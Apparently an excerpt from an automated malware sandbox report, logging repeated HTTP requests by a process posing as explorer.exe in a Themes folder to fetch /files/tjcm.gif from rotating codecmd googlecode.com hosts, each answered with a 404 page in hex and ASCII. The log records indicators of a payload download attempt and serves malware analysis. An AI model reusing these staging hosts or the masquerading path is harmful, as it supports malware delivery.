                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:29.065952063 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      79192.168.2.549793108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:29.464521885 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:30.237894058 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:30 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:30.238106012 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      80192.168.2.549794108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:31.269665956 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:32.028358936 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:31 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:32.028378010 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      81192.168.2.54979574.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:32.437295914 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:33.096333981 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:33 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:33.097240925 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      82192.168.2.549796108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:34.255230904 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:34.959069967 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:34 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:34.959126949 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      83192.168.2.549797108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:35.385014057 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:36.087812901 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:35 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:36.087838888 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      84192.168.2.54979874.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:36.489296913 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:37.208127022 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:37 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:15:37.208149910 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      85192.168.2.549799108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:15:37.566493034 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:15:38.267290115 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:15:38 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
